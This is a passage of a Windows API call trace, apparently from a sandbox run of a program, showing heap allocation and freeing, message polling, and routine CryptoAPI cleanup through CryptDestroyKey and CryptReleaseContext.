0x2e54e78 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0132.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0132.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0132.638] CryptDestroyKey (hKey=0xa875d0) returned 1 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0132.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0132.639] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0132.639] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0132.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0132.639] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.639] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0132.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.640] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0132.640] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0132.640] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0132.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.640] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.640] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0132.640] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0132.640] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0132.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0132.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0132.641] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0132.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0132.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0132.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0132.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0132.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0132.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0132.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0132.642] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0132.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0132.642] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0132.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0132.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0132.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0132.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0132.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.644] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0132.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0132.644] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0132.644] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.645] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.645] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0132.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0132.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0132.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0132.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0132.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0132.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0132.767] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0132.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0132.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0132.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0132.768] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0132.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0132.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0132.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0132.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0132.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0132.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 